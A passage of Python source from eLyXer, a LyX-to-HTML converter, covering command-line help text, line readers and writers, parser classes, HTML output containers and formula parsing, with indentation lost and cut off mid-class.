options = Options.footnotes.split(',')
for option in options:
footoption = option + 'foot'
if hasattr(Options, footoption):
setattr(Options, footoption, True)
else:
Trace.error('Unknown footnotes option: ' + option)
if not Options.endfoot and not Options.marginfoot and not Options.hoverfoot:
Options.hoverfoot = True
if not Options.numberfoot and not Options.symbolfoot:
Options.letterfoot = True
def showoptions(self):
"Show all possible options"
Trace.error(' Common options:')
Trace.error(' --help: show this online help')
Trace.error(' --quiet: disables all runtime messages')
Trace.error('')
Trace.error(' Advanced options:')
Trace.error(' --debug: enable debugging messages (for developers)')
Trace.error(' --version: show version number and release date')
Trace.error(' --lyxformat: return the highest LyX version supported')
Trace.error(' Options for HTML output:')
Trace.error(' --title "title": set the generated page title')
Trace.error(' --css "file.css": use a custom CSS file')
Trace.error(' --embedcss "file.css": embed styles from a CSS file into the output')
Trace.error(' --favicon "icon.ico": insert the specified favicon in the header.')
Trace.error(' --html: output HTML 4.0 instead of the default XHTML')
Trace.error(' --unicode: full Unicode output')
Trace.error(' --iso885915: output a document with ISO-8859-15 encoding')
Trace.error(' --nofooter: remove the footer "generated by eLyXer"')
Trace.error(' --simplemath: do not generate fancy math constructions')
Trace.error(' Options for image output:')
Trace.error(' --directory "img_dir": look for images in the specified directory')
Trace.error(' --destdirectory "dest": put converted images into this directory')
Trace.error(' --imageformat ".ext": image output format, or "copy" to copy images')
Trace.error(' --noconvert: do not convert images, use in original locations')
Trace.error(' --converter "inkscape": use an alternative program to convert images')
Trace.error(' Options for footnote display:')
Trace.error(' --numberfoot: mark footnotes with numbers instead of letters')
Trace.error(' --symbolfoot: mark footnotes with symbols (*, **...)')
Trace.error(' --hoverfoot: show footnotes as hovering text (default)')
Trace.error(' --marginfoot: show footnotes on the page margin')
Trace.error(' --endfoot: show footnotes at the end of the page')
Trace.error(' --supfoot: use superscript for footnote markers (default)')
Trace.error(' --alignfoot: use aligned text for footnote markers')
Trace.error(' --footnotes "options": specify several comma-separated footnotes options')
Trace.error(' Available options are: "number", "symbol", "hover", "margin", "end",')
Trace.error(' "sup", "align"')
Trace.error(' Advanced output options:')
Trace.error(' --splitpart "depth": split the resulting webpage at the given depth')
Trace.error(' --tocfor "page": generate a TOC that points to the given page')
Trace.error(' --target "frame": make all links point to the given frame')
Trace.error(' --notoclabels: omit the part labels in the TOC, such as Chapter')
Trace.error(' --lowmem: do the conversion on the fly (conserve memory)')
Trace.error(' --raw: generate HTML without header or footer.')
Trace.error(' --mathjax remote: use MathJax remotely to display equations')
Trace.error(' --mathjax "URL": use MathJax from the given URL to display equations')
Trace.error(' --googlecharts: use Google Charts to generate formula images')
Trace.error(' --template "file": use a template, put everything in <!--$content-->')
Trace.error(' --copyright: add a copyright notice at the bottom')
Trace.error(' Deprecated options:')
Trace.error(' --toc: (deprecated) create a table of contents')
Trace.error(' --toctarget "page": (deprecated) generate a TOC for the given page')
Trace.error(' --nocopy: (deprecated) maintained for backwards compatibility')
Trace.error(' --jsmath "URL": use jsMath from the given URL to display equations')
sys.exit()
def showversion(self):
"Return the current eLyXer version string"
string = 'eLyXer version ' + GeneralConfig.version['number']
string += ' (' + GeneralConfig.version['date'] + ')'
Trace.error(string)
sys.exit()
def showhardversion(self):
"Return just the version string"
Trace.message(GeneralConfig.version['number'])
sys.exit()
def showversiondate(self):
"Return just the version dte"
Trace.message(GeneralConfig.version['date'])
sys.exit()
def showlyxformat(self):
"Return just the lyxformat parameter"
Trace.message(GeneralConfig.version['lyxformat'])
sys.exit()
class BranchOptions(object):
"A set of options for a branch"
def __init__(self, name):
self.name = name
self.options = {'color':'#ffffff'}
def set(self, key, value):
"Set a branch option"
if not key.startswith(ContainerConfig.string['startcommand']):
Trace.error('Invalid branch option ' + key)
return
key = key.replace(ContainerConfig.string['startcommand'], '')
self.options[key] = value
def isselected(self):
"Return if the branch is selected"
if not 'selected' in self.options:
return False
return self.options['selected'] == '1'
def __unicode__(self):
"String representation"
return 'options for ' + self.name + ': ' + unicode(self.options)
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Cloner(object):
"An object used to clone other objects."
def clone(cls, original):
"Return an exact copy of an object."
"The original object must have an empty constructor."
return cls.create(original.__class__)
def create(cls, type):
"Create an object of a given class."
clone = type.__new__(type)
clone.__init__()
return clone
clone = classmethod(clone)
create = classmethod(create)
class ContainerExtractor(object):
"A class to extract certain containers."
def __init__(self, config):
"The config parameter is a map containing three lists: allowed, copied and extracted."
"Each of the three is a list of class names for containers."
"Allowed containers are included as is into the result."
"Cloned containers are cloned and placed into the result."
"Extracted containers are looked into."
"All other containers are silently ignored."
self.allowed = config['allowed']
self.cloned = config['cloned']
self.extracted = config['extracted']
def extract(self, container):
"Extract a group of selected containers from elyxer.a container."
list = []
locate = lambda c: c.__class__.__name__ in self.allowed + self.cloned
recursive = lambda c: c.__class__.__name__ in self.extracted
process = lambda c: self.process(c, list)
container.recursivesearch(locate, recursive, process)
return list
def process(self, container, list):
"Add allowed containers, clone cloned containers and add the clone."
name = container.__class__.__name__
if name in self.allowed:
list.append(container)
elif name in self.cloned:
list.append(self.safeclone(container))
else:
Trace.error('Unknown container class ' + name)
def safeclone(self, container):
"Return a new container with contents only in a safe list, recursively."
clone = Cloner.clone(container)
clone.output = container.output
clone.contents = self.extract(container)
return clone
class Parser(object):
"A generic parser"
def __init__(self):
self.begin = 0
self.parameters = dict()
def parseheader(self, reader):
"Parse the header"
header = reader.currentline().split()
reader.nextline()
self.begin = reader.linenumber
return header
def parseparameter(self, reader):
"Parse a parameter"
if reader.currentline().strip().startswith('<'):
key, value = self.parsexml(reader)
self.parameters[key] = value
return
split = reader.currentline().strip().split(' ', 1)
reader.nextline()
if len(split) == 0:
return
key = split[0]
if len(split) == 1:
self.parameters[key] = True
return
if not '"' in split[1]:
self.parameters[key] = split[1].strip()
return
doublesplit = split[1].split('"')
self.parameters[key] = doublesplit[1]
def parsexml(self, reader):
"Parse a parameter in xml form: <param attr1=value...>"
strip = reader.currentline().strip()
reader.nextline()
if not strip.endswith('>'):
Trace.error('XML parameter ' + strip + ' should be <...>')
split = strip[1:-1].split()
if len(split) == 0:
Trace.error('Empty XML parameter <>')
return None, None
key = split[0]
del split[0]
if len(split) == 0:
return key, dict()
attrs = dict()
for attr in split:
if not '=' in attr:
Trace.error('Erroneous attribute for ' + key + ': ' + attr)
attr += '="0"'
parts = attr.split('=')
attrkey = parts[0]
value = parts[1].split('"')[1]
attrs[attrkey] = value
return key, attrs
def parseending(self, reader, process):
"Parse until the current ending is found"
if not self.ending:
Trace.error('No ending for ' + unicode(self))
return
while not reader.currentline().startswith(self.ending):
process()
def parsecontainer(self, reader, contents):
container = self.factory.createcontainer(reader)
if container:
container.parent = self.parent
contents.append(container)
def __unicode__(self):
"Return a description"
return self.__class__.__name__ + ' (' + unicode(self.begin) + ')'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class LoneCommand(Parser):
"A parser for just one command line"
def parse(self, reader):
"Read nothing"
return []
class TextParser(Parser):
"A parser for a command and a bit of text"
stack = []
def __init__(self, container):
Parser.__init__(self)
self.ending = None
if container.__class__.__name__ in ContainerConfig.endings:
self.ending = ContainerConfig.endings[container.__class__.__name__]
self.endings = []
def parse(self, reader):
"Parse lines as long as they are text"
TextParser.stack.append(self.ending)
self.endings = TextParser.stack + [ContainerConfig.endings['Layout'],
ContainerConfig.endings['Inset'], self.ending]
contents = []
while not self.isending(reader):
self.parsecontainer(reader, contents)
return contents
def isending(self, reader):
"Check if text is ending"
current = reader.currentline().split()
if len(current) == 0:
return False
if current[0] in self.endings:
if current[0] in TextParser.stack:
TextParser.stack.remove(current[0])
else:
TextParser.stack = []
return True
return False
class ExcludingParser(Parser):
"A parser that excludes the final line"
def parse(self, reader):
"Parse everything up to (and excluding) the final line"
contents = []
self.parseending(reader, lambda: self.parsecontainer(reader, contents))
return contents
class BoundedParser(ExcludingParser):
"A parser bound by a final line"
def parse(self, reader):
"Parse everything, including the final line"
contents = ExcludingParser.parse(self, reader)
# skip last line
reader.nextline()
return contents
class BoundedDummy(Parser):
"A bound parser that ignores everything"
def parse(self, reader):
"Parse the contents of the container"
self.parseending(reader, lambda: reader.nextline())
# skip last line
reader.nextline()
return []
class StringParser(Parser):
"Parses just a string"
def parseheader(self, reader):
"Do nothing, just take note"
self.begin = reader.linenumber + 1
return []
def parse(self, reader):
"Parse a single line"
contents = reader.currentline()
reader.nextline()
return contents
class InsetParser(BoundedParser):
"Parses a LyX inset"
def parse(self, reader):
"Parse inset parameters into a dictionary"
startcommand = ContainerConfig.string['startcommand']
while reader.currentline() != '' and not reader.currentline().startswith(startcommand):
self.parseparameter(reader)
return BoundedParser.parse(self, reader)
class ContainerOutput(object):
"The generic HTML output for a container."
def gethtml(self, container):
"Show an error."
Trace.error('gethtml() not implemented for ' + unicode(self))
def isempty(self):
"Decide if the output is empty: by default, not empty."
return False
class EmptyOutput(ContainerOutput):
def gethtml(self, container):
"Return empty HTML code."
return []
def isempty(self):
"This output is particularly empty."
return True
class FixedOutput(ContainerOutput):
"Fixed output"
def gethtml(self, container):
"Return constant HTML code"
return container.html
class ContentsOutput(ContainerOutput):
"Outputs the contents converted to HTML"
def gethtml(self, container):
"Return the HTML code"
html = []
if container.contents == None:
return html
for element in container.contents:
if not hasattr(element, 'gethtml'):
Trace.error('No html in ' + element.__class__.__name__ + ': ' + unicode(element))
return html
html += element.gethtml()
return html
class TaggedOutput(ContentsOutput):
"Outputs an HTML tag surrounding the contents."
tag = None
breaklines = False
empty = False
def settag(self, tag, breaklines=False, empty=False):
"Set the value for the tag and other attributes."
self.tag = tag
if breaklines:
self.breaklines = breaklines
if empty:
self.empty = empty
return self
def setbreaklines(self, breaklines):
"Set the value for breaklines."
self.breaklines = breaklines
return self
def gethtml(self, container):
"Return the HTML code."
if self.empty:
return [self.selfclosing(container)]
html = [self.open(container)]
html += ContentsOutput.gethtml(self, container)
html.append(self.close(container))
return html
def open(self, container):
"Get opening line."
if not self.checktag(container):
return ''
open = '<' + self.tag + '>'
if self.breaklines:
return open + '\n'
return open
def close(self, container):
"Get closing line."
if not self.checktag(container):
return ''
close = '</' + self.tag.split()[0] + '>'
if self.breaklines:
return '\n' + close + '\n'
return close
def selfclosing(self, container):
"Get self-closing line."
if not self.checktag(container):
return ''
selfclosing = '<' + self.tag + '/>'
if self.breaklines:
return selfclosing + '\n'
return selfclosing
def checktag(self, container):
"Check that the tag is valid."
if not self.tag:
Trace.error('No tag in ' + unicode(container))
return False
if self.tag == '':
return False
return True
class FilteredOutput(ContentsOutput):
"Returns the output in the contents, but filtered:"
"some strings are replaced by others."
def __init__(self):
"Initialize the filters."
self.filters = []
def addfilter(self, original, replacement):
"Add a new filter: replace the original by the replacement."
self.filters.append((original, replacement))
def gethtml(self, container):
"Return the HTML code"
result = []
html = ContentsOutput.gethtml(self, container)
for line in html:
result.append(self.filter(line))
return result
def filter(self, line):
"Filter a single line with all available filters."
for original, replacement in self.filters:
if original in line:
line = line.replace(original, replacement)
return line
class StringOutput(ContainerOutput):
"Returns a bare string as output"
def gethtml(self, container):
"Return a bare string"
return [container.string]
class LineReader(object):
"Reads a file line by line"
def __init__(self, filename):
if isinstance(filename, file):
self.file = filename
else:
self.file = codecs.open(filename, 'rU', 'utf-8')
self.linenumber = 1
self.lastline = None
self.current = None
self.mustread = True
self.depleted = False
try:
self.readline()
except UnicodeDecodeError:
# try compressed file
import gzip
self.file = gzip.open(filename, 'rb')
self.readline()
def setstart(self, firstline):
"Set the first line to read."
for i in range(firstline):
self.file.readline()
self.linenumber = firstline
def setend(self, lastline):
"Set the last line to read."
self.lastline = lastline
def currentline(self):
"Get the current line"
if self.mustread:
self.readline()
return self.current
def nextline(self):
"Go to next line"
if self.depleted:
Trace.fatal('Read beyond file end')
self.mustread = True
def readline(self):
"Read a line from elyxer.file"
self.current = self.file.readline()
if not isinstance(self.file, codecs.StreamReaderWriter):
self.current = self.current.decode('utf-8')
if len(self.current) == 0:
self.depleted = True
self.current = self.current.rstrip('\n\r')
self.linenumber += 1
self.mustread = False
Trace.prefix = 'Line ' + unicode(self.linenumber) + ': '
if self.linenumber % 1000 == 0:
Trace.message('Parsing')
def finished(self):
"Find out if the file is finished"
if self.lastline and self.linenumber == self.lastline:
return True
if self.mustread:
self.readline()
return self.depleted
def close(self):
self.file.close()
class LineWriter(object):
"Writes a file as a series of lists"
file = False
def __init__(self, filename):
if isinstance(filename, file):
self.file = filename
self.filename = None
else:
self.filename = filename
def write(self, strings):
"Write a list of strings"
for string in strings:
if not isinstance(string, basestring):
Trace.error('Not a string: ' + unicode(string) + ' in ' + unicode(strings))
return
self.writestring(string)
def writestring(self, string):
"Write a string"
if not self.file:
self.file = codecs.open(self.filename, 'w', "utf-8")
if self.file == sys.stdout and sys.version_info < (3, 0):
string = string.encode('utf-8')
self.file.write(string)
def writeline(self, line):
"Write a line to file"
self.writestring(line + '\n')
def close(self):
self.file.close()
class Globable(object):
"""A bit of text which can be globbed (lumped together in bits).
Methods current(), skipcurrent(), checkfor() and isout() have to be
implemented by subclasses."""
leavepending = False
def __init__(self):
self.endinglist = EndingList()
def checkbytemark(self):
"Check for a Unicode byte mark and skip it."
if self.finished():
return
if ord(self.current()) == 0xfeff:
self.skipcurrent()
def isout(self):
"Find out if we are out of the position yet."
Trace.error('Unimplemented isout()')
return True
def current(self):
"Return the current character."
Trace.error('Unimplemented current()')
return ''
def checkfor(self, string):
"Check for the given string in the current position."
Trace.error('Unimplemented checkfor()')
return False
def finished(self):
"Find out if the current text has finished."
if self.isout():
if not self.leavepending:
self.endinglist.checkpending()
return True
return self.endinglist.checkin(self)
def skipcurrent(self):
"Return the current character and skip it."
Trace.error('Unimplemented skipcurrent()')
return ''
def glob(self, currentcheck):
"Glob a bit of text that satisfies a check on the current char."
glob = ''
while not self.finished() and currentcheck():
glob += self.skipcurrent()
return glob
def globalpha(self):
"Glob a bit of alpha text"
return self.glob(lambda: self.current().isalpha())
def globnumber(self):
"Glob a row of digits."
return self.glob(lambda: self.current().isdigit())
def isidentifier(self):
"Return if the current character is alphanumeric or _."
if self.current().isalnum() or self.current() == '_':
return True
return False
def globidentifier(self):
"Glob alphanumeric and _ symbols."
return self.glob(self.isidentifier)
def isvalue(self):
"Return if the current character is a value character:"
"not a bracket or a space."
if self.current().isspace():
return False
if self.current() in '{}()':
return False
return True
def globvalue(self):
"Glob a value: any symbols but brackets."
return self.glob(self.isvalue)
def skipspace(self):
"Skip all whitespace at current position."
return self.glob(lambda: self.current().isspace())
def globincluding(self, magicchar):
"Glob a bit of text up to (including) the magic char."
glob = self.glob(lambda: self.current() != magicchar) + magicchar
self.skip(magicchar)
return glob
def globexcluding(self, excluded):
"Glob a bit of text up until (excluding) any excluded character."
return self.glob(lambda: self.current() not in excluded)
def pushending(self, ending, optional = False):
"Push a new ending to the bottom"
self.endinglist.add(ending, optional)
def popending(self, expected = None):
"Pop the ending found at the current position"
if self.isout() and self.leavepending:
return expected
ending = self.endinglist.pop(self)
if expected and expected != ending:
Trace.error('Expected ending ' + expected + ', got ' + ending)
self.skip(ending)
return ending
def nextending(self):
"Return the next ending in the queue."
nextending = self.endinglist.findending(self)
if not nextending:
return None
return nextending.ending
class EndingList(object):
"A list of position endings"
def __init__(self):
self.endings = []
def add(self, ending, optional = False):
"Add a new ending to the list"
self.endings.append(PositionEnding(ending, optional))
def pickpending(self, pos):
"Pick any pending endings from a parse position."
self.endings += pos.endinglist.endings
def checkin(self, pos):
"Search for an ending"
if self.findending(pos):
return True
return False
def pop(self, pos):
"Remove the ending at the current position"
if pos.isout():
Trace.error('No ending out of bounds')
return ''
ending = self.findending(pos)
if not ending:
Trace.error('No ending at ' + pos.current())
return ''
for each in reversed(self.endings):
self.endings.remove(each)
if each == ending:
return each.ending
elif not each.optional:
Trace.error('Removed non-optional ending ' + each)
Trace.error('No endings left')
return ''
def findending(self, pos):
"Find the ending at the current position"
if len(self.endings) == 0:
return None
for index, ending in enumerate(reversed(self.endings)):
if ending.checkin(pos):
return ending
if not ending.optional:
return None
return None
def checkpending(self):
"Check if there are any pending endings"
if len(self.endings) != 0:
Trace.error('Pending ' + unicode(self) + ' left open')
def __unicode__(self):
"Printable representation"
string = 'endings ['
for ending in self.endings:
string += unicode(ending) + ','
if len(self.endings) > 0:
string = string[:-1]
return string + ']'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class PositionEnding(object):
"An ending for a parsing position"
def __init__(self, ending, optional):
self.ending = ending
self.optional = optional
def checkin(self, pos):
"Check for the ending"
return pos.checkfor(self.ending)
def __unicode__(self):
"Printable representation"
string = 'Ending ' + self.ending
if self.optional:
string += ' (optional)'
return string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Position(Globable):
"""A position in a text to parse.
Including those in Globable, functions to implement by subclasses are:
skip(), identifier(), extract(), isout() and current()."""
def __init__(self):
Globable.__init__(self)
def skip(self, string):
"Skip a string"
Trace.error('Unimplemented skip()')
def identifier(self):
"Return an identifier for the current position."
Trace.error('Unimplemented identifier()')
return 'Error'
def extract(self, length):
"Extract the next string of the given length, or None if not enough text,"
"without advancing the parse position."
Trace.error('Unimplemented extract()')
return None
def checkfor(self, string):
"Check for a string at the given position."
return string == self.extract(len(string))
def checkforlower(self, string):
"Check for a string in lower case."
extracted = self.extract(len(string))
if not extracted:
return False
return string.lower() == self.extract(len(string)).lower()
def skipcurrent(self):
"Return the current character and skip it."
current = self.current()
self.skip(current)
return current
def __next__(self):
"Advance the position and return the next character."
self.skipcurrent()
return self.current()
if sys.version_info < (3, 0):
next = __next__
def checkskip(self, string):
"Check for a string at the given position; if there, skip it"
if not self.checkfor(string):
return False
self.skip(string)
return True
def error(self, message):
"Show an error message and the position identifier."
Trace.error(message + ': ' + self.identifier())
class TextPosition(Position):
"A parse position based on a raw text."
def __init__(self, text):
"Create the position from elyxer.some text."
Position.__init__(self)
self.pos = 0
self.text = text
self.checkbytemark()
def skip(self, string):
"Skip a string of characters."
self.pos += len(string)
def identifier(self):
"Return a sample of the remaining text."
length = 30
if self.pos + length > len(self.text):
length = len(self.text) - self.pos
return '*' + self.text[self.pos:self.pos + length] + '*'
def isout(self):
"Find out if we are out of the text yet."
return self.pos >= len(self.text)
def current(self):
"Return the current character, assuming we are not out."
return self.text[self.pos]
def extract(self, length):
"Extract the next string of the given length, or None if not enough text."
if self.pos + length > len(self.text):
return None
return self.text[self.pos : self.pos + length]
class FilePosition(Position):
"A parse position based on an underlying file."
def __init__(self, filename):
"Create the position from a file."
Position.__init__(self)
self.reader = LineReader(filename)
self.pos = 0
self.checkbytemark()
def skip(self, string):
"Skip a string of characters."
length = len(string)
while self.pos + length > len(self.reader.currentline()):
length -= len(self.reader.currentline()) - self.pos + 1
self.nextline()
self.pos += length
def currentline(self):
"Get the current line of the underlying file."
return self.reader.currentline()
def nextline(self):
"Go to the next line."
self.reader.nextline()
self.pos = 0
def linenumber(self):
"Return the line number of the file."
return self.reader.linenumber + 1
def identifier(self):
"Return the current line and line number in the file."
before = self.reader.currentline()[:self.pos - 1]
after = self.reader.currentline()[self.pos:]
return 'line ' + unicode(self.getlinenumber()) + ': ' + before + '*' + after
def isout(self):
"Find out if we are out of the text yet."
if self.pos > len(self.reader.currentline()):
if self.pos > len(self.reader.currentline()) + 1:
Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
self.nextline()
return self.reader.finished()
def current(self):
"Return the current character, assuming we are not out."
if self.pos == len(self.reader.currentline()):
return '\n'
if self.pos > len(self.reader.currentline()):
Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
return '*'
return self.reader.currentline()[self.pos]
def extract(self, length):
"Extract the next string of the given length, or None if not enough text."
if self.pos + length > len(self.reader.currentline()):
return None
return self.reader.currentline()[self.pos : self.pos + length]
class Container(object):
"A container for text and objects in a lyx file"
partkey = None
parent = None
begin = None
def __init__(self):
self.contents = list()
def process(self):
"Process contents"
pass
def gethtml(self):
"Get the resulting HTML"
html = self.output.gethtml(self)
if isinstance(html, basestring):
Trace.error('Raw string ' + html)
html = [html]
return self.escapeall(html)
def escapeall(self, lines):
"Escape all lines in an array according to the output options."
result = []
for line in lines:
if Options.html:
line = self.escape(line, EscapeConfig.html)
if Options.iso885915:
line = self.escape(line, EscapeConfig.iso885915)
line = self.escapeentities(line)
elif not Options.unicode:
line = self.escape(line, EscapeConfig.nonunicode)
result.append(line)
return result
def escape(self, line, replacements = EscapeConfig.entities):
"Escape a line with replacements from elyxer.a map"
pieces = sorted(replacements.keys())
# do them in order
for piece in pieces:
if piece in line:
line = line.replace(piece, replacements[piece])
return line
def escapeentities(self, line):
"Escape all Unicode characters to HTML entities."
result = ''
pos = TextPosition(line)
while not pos.finished():
if ord(pos.current()) > 128:
codepoint = hex(ord(pos.current()))
if codepoint == '0xd835':
codepoint = hex(ord(next(pos)) + 0xf800)
result += '&#' + codepoint[1:] + ';'
else:
result += pos.current()
pos.skipcurrent()
return result
def searchall(self, type):
"Search for all embedded containers of a given type"
list = []
self.searchprocess(type, lambda container: list.append(container))
return list
def searchremove(self, type):
"Search for all containers of a type and remove them"
list = self.searchall(type)
for container in list:
container.parent.contents.remove(container)
return list
def searchprocess(self, type, process):
"Search for elements of a given type and process them"
self.locateprocess(lambda container: isinstance(container, type), process)
def locateprocess(self, locate, process):
"Search for all embedded containers and process them"
for container in self.contents:
container.locateprocess(locate, process)
if locate(container):
process(container)
def recursivesearch(self, locate, recursive, process):
"Perform a recursive search in the container."
for container in self.contents:
if recursive(container):
container.recursivesearch(locate, recursive, process)
if locate(container):
process(container)
def extracttext(self):
"Extract all text from elyxer.allowed containers."
result = ''
constants = ContainerExtractor(ContainerConfig.extracttext).extract(self)
for constant in constants:
result += constant.string
return result
def group(self, index, group, isingroup):
"Group some adjoining elements into a group"
if index >= len(self.contents):
return
if hasattr(self.contents[index], 'grouped'):
return
while index < len(self.contents) and isingroup(self.contents[index]):
self.contents[index].grouped = True
group.contents.append(self.contents[index])
self.contents.pop(index)
self.contents.insert(index, group)
def remove(self, index):
"Remove a container but leave its contents"
container = self.contents[index]
self.contents.pop(index)
while len(container.contents) > 0:
self.contents.insert(index, container.contents.pop())
def tree(self, level = 0):
"Show in a tree"
Trace.debug(" " * level + unicode(self))
for container in self.contents:
container.tree(level + 1)
def getparameter(self, name):
"Get the value of a parameter, if present."
if not name in self.parameters:
return None
return self.parameters[name]
def getparameterlist(self, name):
"Get the value of a comma-separated parameter as a list."
paramtext = self.getparameter(name)
if not paramtext:
return []
return paramtext.split(',')
def hasemptyoutput(self):
"Check if the parent's output is empty."
current = self.parent
while current:
if current.output.isempty():
return True
current = current.parent
return False
def __unicode__(self):
"Get a description"
if not self.begin:
return self.__class__.__name__
return self.__class__.__name__ + '@' + unicode(self.begin)
if sys.version_info >= (3, 0):
__str__ = __unicode__
class BlackBox(Container):
"A container that does not output anything"
def __init__(self):
self.parser = LoneCommand()
self.output = EmptyOutput()
self.contents = []
class LyXFormat(BlackBox):
"Read the lyxformat command"
def process(self):
"Show warning if version < 276"
version = int(self.header[1])
if version < 276:
Trace.error('Warning: unsupported old format version ' + str(version))
if version > int(GeneralConfig.version['lyxformat']):
Trace.error('Warning: unsupported new format version ' + str(version))
class StringContainer(Container):
"A container for a single string"
parsed = None
def __init__(self):
self.parser = StringParser()
self.output = StringOutput()
self.string = ''
def process(self):
"Replace special chars from elyxer.the contents."
if self.parsed:
self.string = self.replacespecial(self.parsed)
self.parsed = None
def replacespecial(self, line):
"Replace all special chars from elyxer.a line"
replaced = self.escape(line, EscapeConfig.entities)
replaced = self.changeline(replaced)
if ContainerConfig.string['startcommand'] in replaced and len(replaced) > 1:
# unprocessed commands
if self.begin:
message = 'Unknown command at ' + unicode(self.begin) + ': '
else:
message = 'Unknown command: '
Trace.error(message + replaced.strip())
return replaced
def changeline(self, line):
line = self.escape(line, EscapeConfig.chars)
if not ContainerConfig.string['startcommand'] in line:
return line
line = self.escape(line, EscapeConfig.commands)
return line
def extracttext(self):
"Return all text."
return self.string
def __unicode__(self):
"Return a printable representation."
result = 'StringContainer'
if self.begin:
result += '@' + unicode(self.begin)
ellipsis = '...'
if len(self.string.strip()) <= 15:
ellipsis = ''
return result + ' (' + self.string.strip()[:15] + ellipsis + ')'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Constant(StringContainer):
"A constant string"
def __init__(self, text):
self.contents = []
self.string = text
self.output = StringOutput()
def __unicode__(self):
return 'Constant: ' + self.string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class TaggedText(Container):
"Text inside a tag"
output = None
def __init__(self):
self.parser = TextParser(self)
self.output = TaggedOutput()
def complete(self, contents, tag, breaklines=False):
"Complete the tagged text and return it"
self.contents = contents
self.output.tag = tag
self.output.breaklines = breaklines
return self
def constant(self, text, tag, breaklines=False):
"Complete the tagged text with a constant"
constant = Constant(text)
return self.complete([constant], tag, breaklines)
def __unicode__(self):
"Return a printable representation."
if not hasattr(self.output, 'tag'):
return 'Emtpy tagged text'
if not self.output.tag:
return 'Tagged <unknown tag>'
return 'Tagged <' + self.output.tag + '>'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class DocumentParameters(object):
"Global parameters for the document."
pdftitle = None
indentstandard = False
tocdepth = 10
startinglevel = 0
maxdepth = 10
language = None
bibliography = None
outputchanges = False
displaymode = False
class FormulaParser(Parser):
"Parses a formula"
def parseheader(self, reader):
"See if the formula is inlined"
self.begin = reader.linenumber + 1
type = self.parsetype(reader)
if not type:
reader.nextline()
type = self.parsetype(reader)
if not type:
Trace.error('Unknown formula type in ' + reader.currentline().strip())
return ['unknown']
return [type]
def parsetype(self, reader):
"Get the formula type from the first line."
if reader.currentline().find(FormulaConfig.starts['simple']) >= 0:
return 'inline'
if reader.currentline().find(FormulaConfig.starts['complex']) >= 0:
return 'block'
if reader.currentline().find(FormulaConfig.starts['unnumbered']) >= 0:
return 'block'
if reader.currentline().find(FormulaConfig.starts['beginbefore']) >= 0:
return 'numbered'
return None
def parse(self, reader):
"Parse the formula until the end"
formula = self.parseformula(reader)
while not reader.currentline().startswith(self.ending):
stripped = reader.currentline().strip()
if len(stripped) > 0:
Trace.error('Unparsed formula line ' + stripped)
reader.nextline()
reader.nextline()
return formula
def parseformula(self, reader):
"Parse the formula contents"
simple = FormulaConfig.starts['simple']
if simple in reader.currentline():
rest = reader.currentline().split(simple, 1)[1]
if simple in rest:
# formula is $...$
return self.parsesingleliner(reader, simple, simple)
# formula is multiline $...$
return self.parsemultiliner(reader, simple, simple)
if FormulaConfig.starts['complex'] in reader.currentline():
# formula of the form \[...\]
return self.parsemultiliner(reader, FormulaConfig.starts['complex'],
FormulaConfig.endings['complex'])
beginbefore = FormulaConfig.starts['beginbefore']
beginafter = FormulaConfig.starts['beginafter']
if beginbefore in reader.currentline():
if reader.currentline().strip().endswith(beginafter):
current = reader.currentline().strip()
endsplit = current.split(beginbefore)[1].split(beginafter)
startpiece = beginbefore + endsplit[0] + beginafter
endbefore = FormulaConfig.endings['endbefore']
endafter = FormulaConfig.endings['endafter']
endpiece = endbefore + endsplit[0] + endafter
return startpiece + self.parsemultiliner(reader, startpiece, endpiece) + endpiece
Trace.error('Missing ' + beginafter + ' in ' + reader.currentline())
return ''
begincommand = FormulaConfig.starts['command']
beginbracket = FormulaConfig.starts['bracket']
if begincommand in reader.currentline() and beginbracket in reader.currentline():
endbracket = FormulaConfig.endings['bracket']
return self.parsemultiliner(reader, beginbracket, endbracket)
Trace.error('Formula beginning ' + reader.currentline() + ' is unknown')
return ''
def parsesingleliner(self, reader, start, ending):
"Parse a formula in one line"
line = reader.currentline().strip()
if not start in line:
Trace.error('Line ' + line + ' does not contain formula start ' + start)
return ''
if not line.endswith(ending):
Trace.error('Formula ' + line + ' does not end with ' + ending)
return ''
index = line.index(start)
rest = line[index + len(start):-len(ending)]
reader.nextline()
return rest
def parsemultiliner(self, reader, start, ending):
"Parse a formula in multiple lines"
formula = ''
line = reader.currentline()
if not start in line:
Trace.error('Line ' + line.strip() + ' does not contain formula start ' + start)
return ''
index = line.index(start)
line = line[index + len(start):].strip()
while not line.endswith(ending):
formula += line + '\n'
reader.nextline()
line = reader.currentline()
formula += line[:-len(ending)]
reader.nextline()
return formula
class MacroParser(FormulaParser):
"A parser for a formula macro."
def parseheader(self, reader):
"See if the formula is inlined"
self.begin = reader.linenumber + 1
return ['inline']
def parse(self, reader):
"Parse the formula until the end"
formula = self.parsemultiliner(reader, self.parent.start, self.ending)
reader.nextline()
return formula
class FormulaBit(Container):
"A bit of a formula"
type = None
size = 1
original = ''
def __init__(self):
"The formula bit type can be 'alpha', 'number', 'font'."
self.contents = []
self.output = ContentsOutput()
def setfactory(self, factory):
"Set the internal formula factory."
self.factory = factory
return self
def add(self, bit):
"Add any kind of formula bit already processed"
self.contents.append(bit)
self.original += bit.original
bit.parent = self
def skiporiginal(self, string, pos):
"Skip a string and add it to the original formula"
self.original += string
if not pos.checkskip(string):
Trace.error('String ' + string + ' not at ' + pos.identifier())
def computesize(self):
"Compute the size of the bit as the max of the sizes of all contents."
if len(self.contents) == 0:
return 1
self.size = max([element.size for element in self.contents])
return self.size
def clone(self):
"Return a copy of itself."
return self.factory.parseformula(self.original)
def __unicode__(self):
"Get a string representation"
return self.__class__.__name__ + ' read in ' + self.original
if sys.version_info >= (3, 0):
__str__ = __unicode__
class TaggedBit(FormulaBit):
"A tagged string in a formula"
def constant(self, constant, tag):
"Set the constant and the tag"
self.output = TaggedOutput().settag(tag)
self.add(FormulaConstant(constant))
return self
def complete(self, contents, tag, breaklines = False):
"Set the constant and the tag"
self.contents = contents
self.output = TaggedOutput().settag(tag, breaklines)
return self
def selfcomplete(self, tag):
